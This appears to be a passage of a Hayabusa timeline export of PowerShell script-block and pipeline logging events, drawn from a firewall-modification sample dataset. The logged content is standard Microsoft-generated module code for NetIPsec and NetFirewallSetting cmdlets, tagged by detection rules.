[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA 
{ [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 